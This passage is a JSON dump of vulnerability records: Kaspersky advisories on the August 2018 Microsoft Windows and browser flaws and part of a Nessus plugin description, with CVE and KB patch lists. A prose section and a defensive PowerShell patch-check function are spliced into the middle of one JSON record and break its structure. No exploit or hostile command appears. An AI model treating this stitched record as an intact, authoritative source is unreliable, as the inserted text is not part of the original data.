\nWindows 8.1 for 32-bit systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nChakraCore \nWindows RT 8.1 \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 10 \nWindows Server 2016 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nInternet Explorer 11 \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8344](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8344>) \n[CVE-2018-8397](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8397>) \n[CVE-2018-8385](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8385>) \n[CVE-2018-8346](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8346>) \n[CVE-2018-8404](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8404>) \n[CVE-2018-8398](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8398>) \n[CVE-2018-8349](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8349>) \n[CVE-2018-8348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8348>) \n[CVE-2018-8394](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8394>) \n[CVE-2018-8389](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8389>) 
\n[CVE-2018-8396](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8396>) \n[CVE-2018-8353](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8353>) \n[CVE-2018-8343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8343>) \n[CVE-2018-8342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8342>) \n[CVE-2018-8341](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8341>) \n[CVE-2018-8339](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8339>) \n[CVE-2018-8373](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8373>) \n[CVE-2018-8345](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8345>) \n[CVE-2018-8371](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8371>) \n[ADV180018](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV180018>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8385>)0.0Unknown \n[CVE-2018-8353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353>)0.0Unknown \n[CVE-2018-8389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389>)0.0Unknown \n[CVE-2018-8371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371>)0.0Unknown \n[CVE-2018-8373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373>)0.0Unknown \n[CVE-2018-8345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345>)0.0Unknown \n[CVE-2018-8349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8349>)0.0Unknown \n[CVE-2018-8398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8398>)0.0Unknown 
\n[CVE-2018-8348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8348>)0.0Unknown \n[CVE-2018-8339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8339>)0.0Unknown \n[CVE-2018-8343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8343>)0.0Unknown \n[CVE-2018-8394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8394>)0.0Unknown \n[CVE-2018-8346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8346>)0.0Unknown \n[CVE-2018-8404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8404>)0.0Unknown \n[CVE-2018-8397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8397>)0.0Unknown \n[CVE-2018-8396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8396>)0.0Unknown \n[CVE-2018-8341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8341>)0.0Unknown \n[CVE-2018-8342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8342>)0.0Unknown \n[CVE-2018-8344](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8344>)0.0Unknown\n\n### *KB list*:\n[4343899](<http://support.microsoft.com/kb/4343899>) \n[4343900](<http://support.microsoft.com/kb/4343900>) \n[4343205](<http://support.microsoft.com/kb/4343205>) \n[4344104](<http://support.microsoft.com/kb/4344104>) \n[4340937](<http://support.microsoft.com/kb/4340937>) \n[4341832](<http://support.microsoft.com/kb/4341832>) \n[4343674](<http://support.microsoft.com/kb/4343674>) \n[4340939](<http://support.microsoft.com/kb/4340939>) \n[4338380](<http://support.microsoft.com/kb/4338380>) \n[4457984](<http://support.microsoft.com/kb/4457984>) \n[4458010](<http://support.microsoft.com/kb/4458010>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11789", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11789", "title": "\r KLA11789Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:04:24", "bulletinFamily": "info", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8253", "CVE-2018-8340", "CVE-2018-8398", "CVE-2018-8349"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, bypass security restrictions, obtain sensitive information.\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 
\nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nMicrosoft Visual Studio 2017 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nMicrosoft Visual Studio 2015 Update 3 \nMicrosoft Visual Studio 2017 version 15.8\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8343>) \n[CVE-2018-8399](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8399>) \n[CVE-2018-8401](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8401>) \n[CVE-2018-8200](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8200>) \n[CVE-2018-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0952>) \n[CVE-2018-8400](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8400>) \n[CVE-2018-8398](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8398>) \n[CVE-2018-8404](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8404>) \n[CVE-2018-8344](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8344>) \n[CVE-2018-8348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8348>) \n[CVE-2018-8339](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8339>) \n[CVE-2018-8394](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8394>) \n[CVE-2018-8345](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8345>) 
\n[CVE-2018-8253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8253>) \n[CVE-2018-8341](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8341>) \n[CVE-2018-8349](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8349>) \n[CVE-2018-8350](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8350>) \n[CVE-2018-8340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8340>) \n[CVE-2018-8204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8204>) \n[CVE-2018-8414](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8414>) \n[CVE-2018-8347](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8347>) \n[CVE-2018-8405](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8405>) \n[CVE-2018-8406](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8406>) \n[ADV180018](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV180018>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2018-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0952>)0.0Unknown \n[CVE-2018-8405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8405>)0.0Unknown \n[CVE-2018-8414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8414>)0.0Unknown \n[CVE-2018-8345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345>)0.0Unknown \n[CVE-2018-8349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8349>)0.0Unknown \n[CVE-2018-8401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8401>)0.0Unknown \n[CVE-2018-8340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8340>)0.0Unknown 
\n[CVE-2018-8398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8398>)0.0Unknown \n[CVE-2018-8204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8204>)0.0Unknown \n[CVE-2018-8406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8406>)0.0Unknown \n[CVE-2018-8348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8348>)0.0Unknown \n[CVE-2018-8347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8347>)0.0Unknown \n[CVE-2018-8339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8339>)0.0Unknown \n[CVE-2018-8343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8343>)0.0Unknown \n[CVE-2018-8400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8400>)0.0Unknown \n[CVE-2018-8394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8394>)0.0Unknown \n[CVE-2018-8350](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8350>)0.0Unknown \n[CVE-2018-8404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8404>)0.0Unknown \n[CVE-2018-8399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8399>)0.0Unknown \n[CVE-2018-8253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8253>)0.0Unknown \n[CVE-2018-8341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8341>)0.0Unknown \n[CVE-2018-8200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8200>)0.0Unknown \n[CVE-2018-8344](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8344>)0.0Unknown\n\n### *KB list*:\n[4343909](<http://support.microsoft.com/kb/4343909>) \n[4343885](<http://support.microsoft.com/kb/4343885>) \n[4343887](<http://support.microsoft.com/kb/4343887>) \n[4343892](<http://support.microsoft.com/kb/4343892>) \n[4343897](<http://support.microsoft.com/kb/4343897>) \n[4343898](<http://support.microsoft.com/kb/4343898>) \n[4343901](<http://support.microsoft.com/kb/4343901>) \n[4343888](<http://support.microsoft.com/kb/4343888>) \n[4343896](<http://support.microsoft.com/kb/4343896>)\n\n### 
*Microsoft official advisories*:\n\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 27, "modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11309", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11309", "title": "\r KLA11309Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8358", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8387", "CVE-2018-8355", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-8380", "CVE-2018-8370", "CVE-2018-8384", "CVE-2018-8359", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8353"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. 
Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, obtain sensitive information, bypass security restrictions.\n\n### *Affected products*:\nChakraCore \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 10 \nInternet Explorer 9 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8372](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8372>) \n[CVE-2018-8385](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8385>) \n[CVE-2018-8266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8266>) \n[CVE-2018-8380](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8380>) \n[CVE-2018-8381](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8381>) \n[CVE-2018-8355](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8355>) \n[CVE-2018-8390](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8390>) \n[CVE-2018-8387](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8387>) \n[CVE-2018-8357](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8357>) \n[CVE-2018-8353](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8353>) \n[CVE-2018-8383](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8383>) \n[CVE-2018-8377](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8377>) \n[CVE-2018-8389](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8389>) \n[CVE-2018-8316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8316>) 
\n[CVE-2018-8388](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8388>) \n[CVE-2018-8371](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8371>) \n[CVE-2018-8351](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8351>) \n[CVE-2018-8373](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8373>) \n[CVE-2018-8403](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8403>) \n[CVE-2018-8370](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8370>) \n[CVE-2018-8358](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8358>) \n[CVE-2018-8384](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8384>) \n[CVE-2018-8359](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8359>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8384>)0.0Unknown \n[CVE-2018-8372](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8372>)0.0Unknown \n[CVE-2018-8385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8385>)0.0Unknown \n[CVE-2018-8266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8266>)0.0Unknown \n[CVE-2018-8380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8380>)0.0Unknown \n[CVE-2018-8359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8359>)0.0Unknown \n[CVE-2018-8381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8381>)0.0Unknown \n[CVE-2018-8355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8355>)0.0Unknown \n[CVE-2018-8390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8390>)0.0Unknown 
\n[CVE-2018-8387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8387>)0.0Unknown \n[CVE-2018-8357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8357>)0.0Unknown \n[CVE-2018-8353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353>)0.0Unknown \n[CVE-2018-8383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8383>)0.0Unknown \n[CVE-2018-8377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8377>)0.0Unknown \n[CVE-2018-8389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389>)0.0Unknown \n[CVE-2018-8316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8316>)0.0Unknown \n[CVE-2018-8388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8388>)0.0Unknown \n[CVE-2018-8371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371>)0.0Unknown \n[CVE-2018-8351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8351>)0.0Unknown \n[CVE-2018-8373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373>)0.0Unknown \n[CVE-2018-8403](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8403>)0.0Unknown \n[CVE-2018-8370](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8370>)0.0Unknown \n[CVE-2018-8358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8358>)0.0Unknown\n\n### *KB list*:\n[4343909](<http://support.microsoft.com/kb/4343909>) \n[4343885](<http://support.microsoft.com/kb/4343885>) \n[4343887](<http://support.microsoft.com/kb/4343887>) \n[4343892](<http://support.microsoft.com/kb/4343892>) \n[4343897](<http://support.microsoft.com/kb/4343897>) \n[4343898](<http://support.microsoft.com/kb/4343898>) \n[4343899](<http://support.microsoft.com/kb/4343899>) \n[4343900](<http://support.microsoft.com/kb/4343900>) \n[4343205](<http://support.microsoft.com/kb/4343205>) \n[4343901](<http://support.microsoft.com/kb/4343901>)\n\n### *Microsoft official advisories*:\n\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 29, 
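The KB list in the KLA11306 entry above is the set of August 2018 cumulative updates that carry the Internet Explorer fixes, one per Windows build. The Nessus plugin further down checks for the rollup remotely over SMB; the PowerShell below is an added local equivalent, not code from Kaspersky's advisory or from Tenable's plugin. It looks for any of those KBs two ways: through Get-HotFix (Win32_QuickFixEngineering, which is fast but does not list every package type) and, on the local machine only, through the Windows Update Agent history COM API. Assumptions: Windows PowerShell 5.1 or later, rights to query WMI and WUA, and that the KB number appears in the update title. The function name and the default KB list copied from this entry are the only names introduced here; which KB belongs to which Windows build is not on this page (it is in the linked KB articles), so a host is patched when the one for its build is present, not when all ten are.

```powershell
# Added example (not from the advisory or Tenable's plugin): report which of the
# August 2018 IE-fix KBs from this entry are installed on a Windows host.
function Test-AugustKBs {
    [CmdletBinding()]
    param(
        # KB numbers to look for; defaults are the KB list from the KLA11306 entry.
        [string[]]$KbIds = @('4343909','4343885','4343887','4343892','4343897',
                             '4343898','4343899','4343900','4343205','4343901'),
        # Remote hosts need DCOM/WMI access for Get-HotFix; the WUA history
        # check below only runs for the local machine.
        [string]$ComputerName = $env:COMPUTERNAME
    )

    $wanted = $KbIds | ForEach-Object { 'KB' + ($_ -replace '^KB', '') }

    # Source 1: Win32_QuickFixEngineering via Get-HotFix. "Absent" here is not
    # final, because QFE misses some update package types.
    $qfe = Get-HotFix -ComputerName $ComputerName -ErrorAction SilentlyContinue |
           Where-Object { $wanted -contains $_.HotFixID }

    # Source 2: Windows Update Agent history (COM). Local host only; keyed on the
    # KB number in the update title, counting only successful installs.
    $history = @()
    if ($ComputerName -eq $env:COMPUTERNAME) {
        $session  = New-Object -ComObject Microsoft.Update.Session
        $searcher = $session.CreateUpdateSearcher()
        $count    = $searcher.GetTotalHistoryCount()
        if ($count -gt 0) {
            $history = $searcher.QueryHistory(0, $count) |
                Where-Object { $_.ResultCode -eq 2 } |              # 2 = orcSucceeded
                Where-Object { $t = $_.Title; ($wanted | Where-Object { $t -like "*$_*" }) }
        }
    }

    $found = @($qfe | ForEach-Object { $_.HotFixID }) +
             @($history | ForEach-Object { [regex]::Match($_.Title, 'KB\d+').Value })
    $found = $found | Sort-Object -Unique

    [pscustomobject]@{
        ComputerName = $ComputerName
        Installed    = @($found)
        Missing      = @($wanted | Where-Object { $found -notcontains $_ })
        # Each KB targets one Windows build, so one hit is the expected "patched" state.
        AnyPresent   = [bool]$found
    }
}

Test-AugustKBs | Format-List
```

Run it elevated; a result with AnyPresent false on a supported build means the August 2018 update for that build has not been applied, and the host should be treated as exposed to the browser CVEs listed in this entry until it is.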
"modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11306", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11306", "title": "\r KLA11306Multiple vulnerabilities in Microsoft Browsers ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T06:20:01", "description": "The remote Windows host is missing security update 4343896\nor cumulative update 4343901. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n "Microsoft COM for Windows" when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. 
